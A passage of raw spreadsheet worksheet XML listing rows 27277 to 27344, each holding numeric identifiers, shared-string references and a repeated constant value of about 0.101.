      <c r="E27277" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27277" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27278" ht="15.75" customHeight="1">
      <c r="A27278" s="1">
        <v>10566.0</v>
      </c>
      <c r="B27278" s="2">
        <v>1.2879442E7</v>
      </c>
      <c r="C27278" s="2" t="s">
        <v>26215</v>
      </c>
      <c r="D27278" s="2">
        <v>1.0</v>
      </c>
      <c r="E27278" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27278" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27279" ht="15.75" customHeight="1">
      <c r="A27279" s="1">
        <v>10579.0</v>
      </c>
      <c r="B27279" s="2">
        <v>1.3027901E7</v>
      </c>
      <c r="C27279" s="2" t="s">
        <v>26216</v>
      </c>
      <c r="D27279" s="2">
        <v>1.0</v>
      </c>
      <c r="E27279" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27279" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27280" ht="15.75" customHeight="1">
      <c r="A27280" s="1">
        <v>10698.0</v>
      </c>
      <c r="B27280" s="2">
        <v>1.4838596E7</v>
      </c>
      <c r="C27280" s="2" t="s">
        <v>26217</v>
      </c>
      <c r="D27280" s="2">
        <v>1.0</v>
      </c>
      <c r="E27280" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27280" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27281" ht="15.75" customHeight="1">
      <c r="A27281" s="1">
        <v>11053.0</v>
      </c>
      <c r="B27281" s="2">
        <v>1.8177902E7</v>
      </c>
      <c r="C27281" s="2" t="s">
        <v>26218</v>
      </c>
      <c r="D27281" s="2">
        <v>1.0</v>
      </c>
      <c r="E27281" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27281" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27282" ht="15.75" customHeight="1">
      <c r="A27282" s="1">
        <v>11598.0</v>
      </c>
      <c r="B27282" s="2">
        <v>2.2939682E7</v>
      </c>
      <c r="C27282" s="2" t="s">
        <v>26219</v>
      </c>
      <c r="D27282" s="2">
        <v>1.0</v>
      </c>
      <c r="E27282" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27282" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27283" ht="15.75" customHeight="1">
      <c r="A27283" s="1">
        <v>11627.0</v>
      </c>
      <c r="B27283" s="2">
        <v>2.3161198E7</v>
      </c>
      <c r="C27283" s="2" t="s">
        <v>26220</v>
      </c>
      <c r="D27283" s="2">
        <v>1.0</v>
      </c>
      <c r="E27283" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27283" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27284" ht="15.75" customHeight="1">
      <c r="A27284" s="1">
        <v>11878.0</v>
      </c>
      <c r="B27284" s="2">
        <v>2.5028566E7</v>
      </c>
      <c r="C27284" s="2" t="s">
        <v>26221</v>
      </c>
      <c r="D27284" s="2">
        <v>1.0</v>
      </c>
      <c r="E27284" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27284" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27285" ht="15.75" customHeight="1">
      <c r="A27285" s="1">
        <v>11944.0</v>
      </c>
      <c r="B27285" s="2">
        <v>2.5541274E7</v>
      </c>
      <c r="C27285" s="2" t="s">
        <v>26222</v>
      </c>
      <c r="D27285" s="2">
        <v>1.0</v>
      </c>
      <c r="E27285" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27285" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27286" ht="15.75" customHeight="1">
      <c r="A27286" s="1">
        <v>12093.0</v>
      </c>
      <c r="B27286" s="2">
        <v>2.6723308E7</v>
      </c>
      <c r="C27286" s="2" t="s">
        <v>26223</v>
      </c>
      <c r="D27286" s="2">
        <v>1.0</v>
      </c>
      <c r="E27286" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27286" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27287" ht="15.75" customHeight="1">
      <c r="A27287" s="1">
        <v>12118.0</v>
      </c>
      <c r="B27287" s="2">
        <v>2.6885772E7</v>
      </c>
      <c r="C27287" s="2" t="s">
        <v>26224</v>
      </c>
      <c r="D27287" s="2">
        <v>1.0</v>
      </c>
      <c r="E27287" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27287" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27288" ht="15.75" customHeight="1">
      <c r="A27288" s="1">
        <v>12374.0</v>
      </c>
      <c r="B27288" s="2">
        <v>2.8822969E7</v>
      </c>
      <c r="C27288" s="2" t="s">
        <v>26225</v>
      </c>
      <c r="D27288" s="2">
        <v>1.0</v>
      </c>
      <c r="E27288" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27288" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27289" ht="15.75" customHeight="1">
      <c r="A27289" s="1">
        <v>12449.0</v>
      </c>
      <c r="B27289" s="2">
        <v>2.9304961E7</v>
      </c>
      <c r="C27289" s="2" t="s">
        <v>26226</v>
      </c>
      <c r="D27289" s="2">
        <v>1.0</v>
      </c>
      <c r="E27289" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27289" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27290" ht="15.75" customHeight="1">
      <c r="A27290" s="1">
        <v>12768.0</v>
      </c>
      <c r="B27290" s="2">
        <v>3.1255503E7</v>
      </c>
      <c r="C27290" s="2" t="s">
        <v>26227</v>
      </c>
      <c r="D27290" s="2">
        <v>1.0</v>
      </c>
      <c r="E27290" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27290" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27291" ht="15.75" customHeight="1">
      <c r="A27291" s="1">
        <v>13099.0</v>
      </c>
      <c r="B27291" s="2">
        <v>3.3520598E7</v>
      </c>
      <c r="C27291" s="2" t="s">
        <v>26228</v>
      </c>
      <c r="D27291" s="2">
        <v>1.0</v>
      </c>
      <c r="E27291" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27291" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27292" ht="15.75" customHeight="1">
      <c r="A27292" s="1">
        <v>13262.0</v>
      </c>
      <c r="B27292" s="2">
        <v>3.4323296E7</v>
      </c>
      <c r="C27292" s="2" t="s">
        <v>26229</v>
      </c>
      <c r="D27292" s="2">
        <v>1.0</v>
      </c>
      <c r="E27292" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27292" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27293" ht="15.75" customHeight="1">
      <c r="A27293" s="1">
        <v>13445.0</v>
      </c>
      <c r="B27293" s="2">
        <v>3.5171284E7</v>
      </c>
      <c r="C27293" s="2" t="s">
        <v>26230</v>
      </c>
      <c r="D27293" s="2">
        <v>1.0</v>
      </c>
      <c r="E27293" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27293" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27294" ht="15.75" customHeight="1">
      <c r="A27294" s="1">
        <v>13662.0</v>
      </c>
      <c r="B27294" s="2">
        <v>3.5976258E7</v>
      </c>
      <c r="C27294" s="2" t="s">
        <v>26231</v>
      </c>
      <c r="D27294" s="2">
        <v>1.0</v>
      </c>
      <c r="E27294" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27294" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27295" ht="15.75" customHeight="1">
      <c r="A27295" s="1">
        <v>13878.0</v>
      </c>
      <c r="B27295" s="2">
        <v>3.6985298E7</v>
      </c>
      <c r="C27295" s="2" t="s">
        <v>26232</v>
      </c>
      <c r="D27295" s="2">
        <v>1.0</v>
      </c>
      <c r="E27295" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27295" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27296" ht="15.75" customHeight="1">
      <c r="A27296" s="1">
        <v>14395.0</v>
      </c>
      <c r="B27296" s="2">
        <v>3.9127353E7</v>
      </c>
      <c r="C27296" s="2" t="s">
        <v>26233</v>
      </c>
      <c r="D27296" s="2">
        <v>1.0</v>
      </c>
      <c r="E27296" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27296" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27297" ht="15.75" customHeight="1">
      <c r="A27297" s="1">
        <v>14766.0</v>
      </c>
      <c r="B27297" s="2">
        <v>4.0831444E7</v>
      </c>
      <c r="C27297" s="2" t="s">
        <v>26234</v>
      </c>
      <c r="D27297" s="2">
        <v>1.0</v>
      </c>
      <c r="E27297" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27297" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27298" ht="15.75" customHeight="1">
      <c r="A27298" s="1">
        <v>14855.0</v>
      </c>
      <c r="B27298" s="2">
        <v>4.1063305E7</v>
      </c>
      <c r="C27298" s="2" t="s">
        <v>26235</v>
      </c>
      <c r="D27298" s="2">
        <v>1.0</v>
      </c>
      <c r="E27298" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27298" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27299" ht="15.75" customHeight="1">
      <c r="A27299" s="1">
        <v>15527.0</v>
      </c>
      <c r="B27299" s="2">
        <v>4.3297435E7</v>
      </c>
      <c r="C27299" s="2" t="s">
        <v>26236</v>
      </c>
      <c r="D27299" s="2">
        <v>1.0</v>
      </c>
      <c r="E27299" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27299" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27300" ht="15.75" customHeight="1">
      <c r="A27300" s="1">
        <v>16141.0</v>
      </c>
      <c r="B27300" s="2">
        <v>4.5548909E7</v>
      </c>
      <c r="C27300" s="2" t="s">
        <v>26237</v>
      </c>
      <c r="D27300" s="2">
        <v>1.0</v>
      </c>
      <c r="E27300" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27300" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27301" ht="15.75" customHeight="1">
      <c r="A27301" s="1">
        <v>17111.0</v>
      </c>
      <c r="B27301" s="2">
        <v>4.8738596E7</v>
      </c>
      <c r="C27301" s="2" t="s">
        <v>26238</v>
      </c>
      <c r="D27301" s="2">
        <v>1.0</v>
      </c>
      <c r="E27301" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27301" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27302" ht="15.75" customHeight="1">
      <c r="A27302" s="1">
        <v>17243.0</v>
      </c>
      <c r="B27302" s="2">
        <v>4.9078767E7</v>
      </c>
      <c r="C27302" s="2" t="s">
        <v>26239</v>
      </c>
      <c r="D27302" s="2">
        <v>1.0</v>
      </c>
      <c r="E27302" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27302" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27303" ht="15.75" customHeight="1">
      <c r="A27303" s="1">
        <v>17302.0</v>
      </c>
      <c r="B27303" s="2">
        <v>4.9275272E7</v>
      </c>
      <c r="C27303" s="2" t="s">
        <v>26240</v>
      </c>
      <c r="D27303" s="2">
        <v>1.0</v>
      </c>
      <c r="E27303" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27303" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27304" ht="15.75" customHeight="1">
      <c r="A27304" s="1">
        <v>17536.0</v>
      </c>
      <c r="B27304" s="2">
        <v>5.0112937E7</v>
      </c>
      <c r="C27304" s="2" t="s">
        <v>26241</v>
      </c>
      <c r="D27304" s="2">
        <v>1.0</v>
      </c>
      <c r="E27304" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27304" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27305" ht="15.75" customHeight="1">
      <c r="A27305" s="1">
        <v>18221.0</v>
      </c>
      <c r="B27305" s="2">
        <v>5.2101728E7</v>
      </c>
      <c r="C27305" s="2" t="s">
        <v>26242</v>
      </c>
      <c r="D27305" s="2">
        <v>1.0</v>
      </c>
      <c r="E27305" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27305" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27306" ht="15.75" customHeight="1">
      <c r="A27306" s="1">
        <v>18297.0</v>
      </c>
      <c r="B27306" s="2">
        <v>5.2320268E7</v>
      </c>
      <c r="C27306" s="2" t="s">
        <v>26243</v>
      </c>
      <c r="D27306" s="2">
        <v>1.0</v>
      </c>
      <c r="E27306" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27306" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27307" ht="15.75" customHeight="1">
      <c r="A27307" s="1">
        <v>18328.0</v>
      </c>
      <c r="B27307" s="2">
        <v>5.2407775E7</v>
      </c>
      <c r="C27307" s="2" t="s">
        <v>26244</v>
      </c>
      <c r="D27307" s="2">
        <v>1.0</v>
      </c>
      <c r="E27307" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27307" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27308" ht="15.75" customHeight="1">
      <c r="A27308" s="1">
        <v>18657.0</v>
      </c>
      <c r="B27308" s="2">
        <v>5.3490728E7</v>
      </c>
      <c r="C27308" s="2" t="s">
        <v>26245</v>
      </c>
      <c r="D27308" s="2">
        <v>1.0</v>
      </c>
      <c r="E27308" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27308" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27309" ht="15.75" customHeight="1">
      <c r="A27309" s="1">
        <v>19256.0</v>
      </c>
      <c r="B27309" s="2">
        <v>5.5124866E7</v>
      </c>
      <c r="C27309" s="2" t="s">
        <v>26246</v>
      </c>
      <c r="D27309" s="2">
        <v>1.0</v>
      </c>
      <c r="E27309" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27309" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27310" ht="15.75" customHeight="1">
      <c r="A27310" s="1">
        <v>19412.0</v>
      </c>
      <c r="B27310" s="2">
        <v>5.5603151E7</v>
      </c>
      <c r="C27310" s="2" t="s">
        <v>26247</v>
      </c>
      <c r="D27310" s="2">
        <v>1.0</v>
      </c>
      <c r="E27310" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27310" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27311" ht="15.75" customHeight="1">
      <c r="A27311" s="1">
        <v>20119.0</v>
      </c>
      <c r="B27311" s="2">
        <v>5177574.0</v>
      </c>
      <c r="C27311" s="2" t="s">
        <v>26248</v>
      </c>
      <c r="D27311" s="2">
        <v>1.0</v>
      </c>
      <c r="E27311" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27311" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27312" ht="15.75" customHeight="1">
      <c r="A27312" s="1">
        <v>20804.0</v>
      </c>
      <c r="B27312" s="2">
        <v>1.5292335E7</v>
      </c>
      <c r="C27312" s="2" t="s">
        <v>26249</v>
      </c>
      <c r="D27312" s="2">
        <v>1.0</v>
      </c>
      <c r="E27312" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27312" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27313" ht="15.75" customHeight="1">
      <c r="A27313" s="1">
        <v>20891.0</v>
      </c>
      <c r="B27313" s="2">
        <v>1.6160883E7</v>
      </c>
      <c r="C27313" s="2" t="s">
        <v>26250</v>
      </c>
      <c r="D27313" s="2">
        <v>1.0</v>
      </c>
      <c r="E27313" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27313" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27314" ht="15.75" customHeight="1">
      <c r="A27314" s="1">
        <v>21239.0</v>
      </c>
      <c r="B27314" s="2">
        <v>1.9756105E7</v>
      </c>
      <c r="C27314" s="2" t="s">
        <v>26251</v>
      </c>
      <c r="D27314" s="2">
        <v>1.0</v>
      </c>
      <c r="E27314" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27314" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27315" ht="15.75" customHeight="1">
      <c r="A27315" s="1">
        <v>22104.0</v>
      </c>
      <c r="B27315" s="2">
        <v>3.0844183E7</v>
      </c>
      <c r="C27315" s="2" t="s">
        <v>26252</v>
      </c>
      <c r="D27315" s="2">
        <v>1.0</v>
      </c>
      <c r="E27315" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27315" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27316" ht="15.75" customHeight="1">
      <c r="A27316" s="1">
        <v>22399.0</v>
      </c>
      <c r="B27316" s="2">
        <v>3.5566806E7</v>
      </c>
      <c r="C27316" s="2" t="s">
        <v>26253</v>
      </c>
      <c r="D27316" s="2">
        <v>1.0</v>
      </c>
      <c r="E27316" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27316" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27317" ht="15.75" customHeight="1">
      <c r="A27317" s="1">
        <v>22469.0</v>
      </c>
      <c r="B27317" s="2">
        <v>3.6754478E7</v>
      </c>
      <c r="C27317" s="2" t="s">
        <v>26254</v>
      </c>
      <c r="D27317" s="2">
        <v>1.0</v>
      </c>
      <c r="E27317" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27317" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27318" ht="15.75" customHeight="1">
      <c r="A27318" s="1">
        <v>22474.0</v>
      </c>
      <c r="B27318" s="2">
        <v>3.6814151E7</v>
      </c>
      <c r="C27318" s="2" t="s">
        <v>26255</v>
      </c>
      <c r="D27318" s="2">
        <v>1.0</v>
      </c>
      <c r="E27318" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27318" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27319" ht="15.75" customHeight="1">
      <c r="A27319" s="1">
        <v>22475.0</v>
      </c>
      <c r="B27319" s="2">
        <v>3.6820723E7</v>
      </c>
      <c r="C27319" s="2" t="s">
        <v>26256</v>
      </c>
      <c r="D27319" s="2">
        <v>1.0</v>
      </c>
      <c r="E27319" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27319" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27320" ht="15.75" customHeight="1">
      <c r="A27320" s="1">
        <v>22562.0</v>
      </c>
      <c r="B27320" s="2">
        <v>3.8387432E7</v>
      </c>
      <c r="C27320" s="2" t="s">
        <v>26257</v>
      </c>
      <c r="D27320" s="2">
        <v>1.0</v>
      </c>
      <c r="E27320" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27320" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27321" ht="15.75" customHeight="1">
      <c r="A27321" s="1">
        <v>22720.0</v>
      </c>
      <c r="B27321" s="2">
        <v>4.3483082E7</v>
      </c>
      <c r="C27321" s="2" t="s">
        <v>26258</v>
      </c>
      <c r="D27321" s="2">
        <v>1.0</v>
      </c>
      <c r="E27321" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27321" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27322" ht="15.75" customHeight="1">
      <c r="A27322" s="1">
        <v>22953.0</v>
      </c>
      <c r="B27322" s="2">
        <v>4.9004248E7</v>
      </c>
      <c r="C27322" s="2" t="s">
        <v>26259</v>
      </c>
      <c r="D27322" s="2">
        <v>1.0</v>
      </c>
      <c r="E27322" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27322" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27323" ht="15.75" customHeight="1">
      <c r="A27323" s="1">
        <v>22992.0</v>
      </c>
      <c r="B27323" s="2">
        <v>4944314.0</v>
      </c>
      <c r="C27323" s="2" t="s">
        <v>26260</v>
      </c>
      <c r="D27323" s="2">
        <v>1.0</v>
      </c>
      <c r="E27323" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27323" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27324" ht="15.75" customHeight="1">
      <c r="A27324" s="1">
        <v>23191.0</v>
      </c>
      <c r="B27324" s="2">
        <v>5.2362453E7</v>
      </c>
      <c r="C27324" s="2" t="s">
        <v>26261</v>
      </c>
      <c r="D27324" s="2">
        <v>1.0</v>
      </c>
      <c r="E27324" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27324" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27325" ht="15.75" customHeight="1">
      <c r="A27325" s="1">
        <v>23619.0</v>
      </c>
      <c r="B27325" s="2">
        <v>6489157.0</v>
      </c>
      <c r="C27325" s="2" t="s">
        <v>26262</v>
      </c>
      <c r="D27325" s="2">
        <v>1.0</v>
      </c>
      <c r="E27325" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27325" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27326" ht="15.75" customHeight="1">
      <c r="A27326" s="1">
        <v>23869.0</v>
      </c>
      <c r="B27326" s="2">
        <v>8341126.0</v>
      </c>
      <c r="C27326" s="2" t="s">
        <v>26263</v>
      </c>
      <c r="D27326" s="2">
        <v>1.0</v>
      </c>
      <c r="E27326" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27326" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27327" ht="15.75" customHeight="1">
      <c r="A27327" s="1">
        <v>24016.0</v>
      </c>
      <c r="B27327" s="2">
        <v>9323562.0</v>
      </c>
      <c r="C27327" s="2" t="s">
        <v>26264</v>
      </c>
      <c r="D27327" s="2">
        <v>1.0</v>
      </c>
      <c r="E27327" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27327" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27328" ht="15.75" customHeight="1">
      <c r="A27328" s="1">
        <v>24728.0</v>
      </c>
      <c r="B27328" s="2">
        <v>1.1722508E7</v>
      </c>
      <c r="C27328" s="2" t="s">
        <v>26265</v>
      </c>
      <c r="D27328" s="2">
        <v>1.0</v>
      </c>
      <c r="E27328" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27328" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27329" ht="15.75" customHeight="1">
      <c r="A27329" s="1">
        <v>24856.0</v>
      </c>
      <c r="B27329" s="2">
        <v>1.2207463E7</v>
      </c>
      <c r="C27329" s="2" t="s">
        <v>26266</v>
      </c>
      <c r="D27329" s="2">
        <v>1.0</v>
      </c>
      <c r="E27329" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27329" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27330" ht="15.75" customHeight="1">
      <c r="A27330" s="1">
        <v>24974.0</v>
      </c>
      <c r="B27330" s="2">
        <v>1.2671537E7</v>
      </c>
      <c r="C27330" s="2" t="s">
        <v>26267</v>
      </c>
      <c r="D27330" s="2">
        <v>1.0</v>
      </c>
      <c r="E27330" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27330" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27331" ht="15.75" customHeight="1">
      <c r="A27331" s="1">
        <v>25427.0</v>
      </c>
      <c r="B27331" s="2">
        <v>1.3821075E7</v>
      </c>
      <c r="C27331" s="2" t="s">
        <v>26268</v>
      </c>
      <c r="D27331" s="2">
        <v>1.0</v>
      </c>
      <c r="E27331" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27331" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27332" ht="15.75" customHeight="1">
      <c r="A27332" s="1">
        <v>26186.0</v>
      </c>
      <c r="B27332" s="2">
        <v>1.6160882E7</v>
      </c>
      <c r="C27332" s="2" t="s">
        <v>26250</v>
      </c>
      <c r="D27332" s="2">
        <v>1.0</v>
      </c>
      <c r="E27332" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27332" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27333" ht="15.75" customHeight="1">
      <c r="A27333" s="1">
        <v>26302.0</v>
      </c>
      <c r="B27333" s="2">
        <v>1.6566857E7</v>
      </c>
      <c r="C27333" s="2" t="s">
        <v>26269</v>
      </c>
      <c r="D27333" s="2">
        <v>1.0</v>
      </c>
      <c r="E27333" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27333" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27334" ht="15.75" customHeight="1">
      <c r="A27334" s="1">
        <v>26604.0</v>
      </c>
      <c r="B27334" s="2">
        <v>1.798606E7</v>
      </c>
      <c r="C27334" s="2" t="s">
        <v>26270</v>
      </c>
      <c r="D27334" s="2">
        <v>1.0</v>
      </c>
      <c r="E27334" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27334" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27335" ht="15.75" customHeight="1">
      <c r="A27335" s="1">
        <v>26605.0</v>
      </c>
      <c r="B27335" s="2">
        <v>1.798606E7</v>
      </c>
      <c r="C27335" s="2" t="s">
        <v>26271</v>
      </c>
      <c r="D27335" s="2">
        <v>1.0</v>
      </c>
      <c r="E27335" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27335" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27336" ht="15.75" customHeight="1">
      <c r="A27336" s="1">
        <v>26697.0</v>
      </c>
      <c r="B27336" s="2">
        <v>1.8133686E7</v>
      </c>
      <c r="C27336" s="2" t="s">
        <v>26272</v>
      </c>
      <c r="D27336" s="2">
        <v>1.0</v>
      </c>
      <c r="E27336" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27336" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27337" ht="15.75" customHeight="1">
      <c r="A27337" s="1">
        <v>28046.0</v>
      </c>
      <c r="B27337" s="2">
        <v>2.4538133E7</v>
      </c>
      <c r="C27337" s="2" t="s">
        <v>26273</v>
      </c>
      <c r="D27337" s="2">
        <v>1.0</v>
      </c>
      <c r="E27337" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27337" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27338" ht="15.75" customHeight="1">
      <c r="A27338" s="1">
        <v>28092.0</v>
      </c>
      <c r="B27338" s="2">
        <v>2.4654294E7</v>
      </c>
      <c r="C27338" s="2" t="s">
        <v>26274</v>
      </c>
      <c r="D27338" s="2">
        <v>1.0</v>
      </c>
      <c r="E27338" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27338" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27339" ht="15.75" customHeight="1">
      <c r="A27339" s="1">
        <v>28098.0</v>
      </c>
      <c r="B27339" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C27339" s="2" t="s">
        <v>26275</v>
      </c>
      <c r="D27339" s="2">
        <v>1.0</v>
      </c>
      <c r="E27339" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27339" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27340" ht="15.75" customHeight="1">
      <c r="A27340" s="1">
        <v>29450.0</v>
      </c>
      <c r="B27340" s="2">
        <v>3.2242295E7</v>
      </c>
      <c r="C27340" s="2" t="s">
        <v>26276</v>
      </c>
      <c r="D27340" s="2">
        <v>1.0</v>
      </c>
      <c r="E27340" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27340" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27341" ht="15.75" customHeight="1">
      <c r="A27341" s="1">
        <v>29651.0</v>
      </c>
      <c r="B27341" s="2">
        <v>3.3870659E7</v>
      </c>
      <c r="C27341" s="2" t="s">
        <v>26277</v>
      </c>
      <c r="D27341" s="2">
        <v>1.0</v>
      </c>
      <c r="E27341" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27341" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27342" ht="15.75" customHeight="1">
      <c r="A27342" s="1">
        <v>29868.0</v>
      </c>
      <c r="B27342" s="2">
        <v>3.5919063E7</v>
      </c>
      <c r="C27342" s="2" t="s">
        <v>26278</v>
      </c>
      <c r="D27342" s="2">
        <v>1.0</v>
      </c>
      <c r="E27342" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27342" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27343" ht="15.75" customHeight="1">
      <c r="A27343" s="1">
        <v>30038.0</v>
      </c>
      <c r="B27343" s="2">
        <v>3.6211655E7</v>
      </c>
      <c r="C27343" s="2" t="s">
        <v>26279</v>
      </c>
      <c r="D27343" s="2">
        <v>1.0</v>
      </c>
      <c r="E27343" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27343" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="27344" ht="15.75" customHeight="1">
      <c r="A27344" s="1">
        <v>30987.0</v>
      </c>
      <c r="B27344" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C27344" s="2" t="s">
        <v>26280</v>
      </c>
      <c r="D27344" s="2">
        <v>1.0</v>
      </c>
